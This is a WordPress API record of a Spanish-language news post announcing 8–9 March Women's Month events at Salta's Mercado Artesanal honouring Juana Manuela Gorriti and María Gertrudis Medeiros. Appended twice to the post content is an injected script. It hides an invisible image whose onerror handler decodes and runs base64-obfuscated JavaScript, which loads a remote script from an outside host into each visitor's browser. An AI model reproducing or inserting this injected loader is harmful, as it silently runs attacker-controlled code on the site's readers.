{"id":2308,"date":"2023-03-06T12:24:29","date_gmt":"2023-03-06T15:24:29","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2308"},"modified":"2025-08-14T00:21:55","modified_gmt":"2025-08-14T03:21:55","slug":"el-mercado-artesanal-de-salta-rendira-homenaje-a-heroinas-de-la-patria","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2308","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-mercado-artesanal-de-salta-rendira-homenaje-a-heroinas-de-la-patria-88275\">El Mercado Artesanal de Salta rendir\u00e1 homenaje a hero\u00ednas de la Patria<\/a>"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#ea4a72\"><em>En el marco del Mes de la Mujer, el 8 y 9 de marzo se desarrollar\u00e1n actividades gratuitas en honor a Juana Manuela Gorriti y Mar\u00eda Gertrudis Medeiros, que incluir\u00e1n cantata, paneles, muestra, danzas, degustaci\u00f3n y el descubrimiento de placa de imposici\u00f3n de nombre del Sal\u00f3n de Usos M\u00faltiples.<\/em><\/h4>\n\n\n\n<p>En el D\u00eda Internacional de la Mujer y con el objetivo de destacar su valent\u00eda y entrega por la Patria, se rendir\u00e1 homenaje a&nbsp;<strong>Juana Manuela Gorriti&nbsp;<\/strong>y&nbsp;<strong>Mar\u00eda Gertrudis Medeiros<\/strong>, quienes tuvieron un papel importante en la lucha por la independencia y fueron protagonistas de esa parte de la historia, escrita en tierras salte\u00f1as.<\/p>\n\n\n\n<p>Las actividades tendr\u00e1n lugar el mi\u00e9rcoles 8 y jueves 9 de marzo en las instalaciones del Mercado Artesanal, Av. San Mart\u00edn 2555, con entrada gratuita.<\/p>\n\n\n\n<p><strong>Cronograma<\/strong><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6015-el-mercado-artesanal-de-salta-rendira-homenaje-a-heroinas-de-la-patria.jpg\" alt=\"\" width=\"265\" height=\"176\"\/><\/figure><\/div>\n\n\n<ul class=\"wp-block-list\">\n<li>Mi\u00e9rcoles 8, 18:30 horas: Juana Manuela Gorriti \u201cSexo \u2013 Poder \u2013 Mazamorra\u201d a cargo de la directora Regi\u00f3n Andina ACRA, Chef Norma Azar &#8211; Sabor a Mi Tierra Salta<\/li>\n<\/ul>\n\n\n\n<p>Las actividades estar\u00e1n coordinadas por el director de la Comisi\u00f3n Provincial del Bicentenario,&nbsp;<strong>Alberto Barros<\/strong>; el director del Programa Ra\u00edces Vidas e Historias de un Inmigrante, Frank Capasso y G\u00fcemes Equipo de Competencia.<\/p>\n\n\n\n<p>Panelistas invitados: Mart\u00edn G\u00fcemes Arruabarrena; chef Luly L\u00f3pez Arias; Marta de la Zerda de la Asociaci\u00f3n de Hero\u00ednas Hispanoamericanas; Virginia Pastrana de la Biblioteca y Museo Regimiento de Caballer\u00eda Exploraci\u00f3n 5\u00b0 \u201cGral. G\u00fcemes\u201d; M\u00f3nica \u00c1lvarez, c\u00f3nsul de Bolivia y Alfonso Saravia, productor de ma\u00edz de la Finca La Falda.<\/p>\n\n\n\n<p>Con la participaci\u00f3n de Fanny Chauqui (artista textil); Sarita Maidana (coplera); Jos\u00e9 Cantero Verni y Jos\u00e9 Paredes (poetas, artistas y compositores); Norma Quintero (artista crochet); Danzas Folcl\u00f3ricas con el profesor Hern\u00e1n Leal \u201cLos Hijos de Fierro\u201d; Bel\u00e9n Salazar \u201cEspecias y Elaboraciones Do\u00f1a Anita\u201d; Carolina Gil \u201cDulces Sofia \u2013 Gastronom\u00eda\u201d; Carolina Guti\u00e9rrez IKIGAI (artistas t\u00e9cnicas en decapado) y Sabor Azar.<\/p>\n\n\n\n<p>Habr\u00e1 degustaci\u00f3n de mazamorra por colectividades de Bolivia, Venezuela, Colombia, Cuba, Brasil y Argentina.<\/p>\n\n\n\n<p>Se presentar\u00e1 la muestra art\u00edstica de \u201cMujeres Emprendedoras de la Universidad Cat\u00f3lica de Salta\u201d.<\/p>\n\n\n\n<p>Colaboran en la actividad: La Selestina; Atacopampa; El Arte del Buen Comer; Ermaya; Sabor Azar; Lebig Bakery; 4 Salame y La Pome\u00f1a.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6016-el-mercado-artesanal-de-salta-rendira-homenaje-a-heroinas-de-la-patria.jpg\" alt=\"\" width=\"316\" height=\"210\"\/><\/figure><\/div>\n\n\n<ul class=\"wp-block-list\">\n<li>Jueves 9:&nbsp;18 horas: Homenaje y cantata a Mar\u00eda Gertrudis Medeiros<\/li>\n<\/ul>\n\n\n\n<p>Descubrimiento de placa de imposici\u00f3n de nombre al Sal\u00f3n de Usos M\u00faltiples del Mercado Artesanal por Mar\u00eda Gertrudis Medeiros y placa de reconocimiento por el Municipio de Campo Santos.<\/p>\n\n\n\n<p>El historiador Eduardo Medina de Campo Santo, realizar\u00e1 una referencia hist\u00f3rica sobre la vida y rol de la hero\u00edna para la libertad de Salta y Argentina.<\/p>\n\n\n\n<p>Para finalizar, el poeta, artista y compositor, Jos\u00e9 Cantero Verni, rendir\u00e1 homenaje con una cantata a Gertrudis de Medeiros. Los presentes podr\u00e1n disfrutar de un vino de honor.<\/p>\n\n\n\n<p><strong>Sobre las hero\u00ednas<\/strong><\/p>\n\n\n\n<p><strong>Juana Manuela Gorriti:&nbsp;<\/strong>Primera poetiza latinoamericana que luch\u00f3 por la emancipaci\u00f3n femenina a trav\u00e9s de la educaci\u00f3n. Su figura simboliza el fundamento de la lucha por los derechos de la mujer. Naci\u00f3 en Salta e hizo vanguardia de la liberaci\u00f3n y autonom\u00eda de sus pares.<\/p>\n\n\n\n<p><strong>Gertrudis Medeiros:\u00a0<\/strong>Realiz\u00f3 tareas de espionaje y sabotaje a las fuerzas realistas que ocuparon la ciudad de Salta, alertando al general G\u00fcemes a trav\u00e9s de informes complejos y detallados sobre los movimientos realistas. Fue torturada y le negaron su pensi\u00f3n.<\/p>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-mercado-artesanal-de-salta-rendira-homenaje-a-heroinas-de-la-patria-88275\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el marco del Mes de la Mujer, el 8 y 9 de marzo se desarrollar\u00e1n actividades gratuitas en honor a Juana Manuela Gorriti y Mar\u00eda Gertrudis Medeiros, que incluir\u00e1n cantata, paneles, muestra, danzas, degustaci\u00f3n y el descubrimiento de placa de imposici\u00f3n de nombre del Sal\u00f3n de Usos M\u00faltiples. En el D\u00eda Internacional de la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2309,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2308","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2308"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2308"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2308\/revisions"}],"predecessor-version":[{"id":7156,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2308\/revisions\/7156"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2309"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2308"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2308"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2308"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}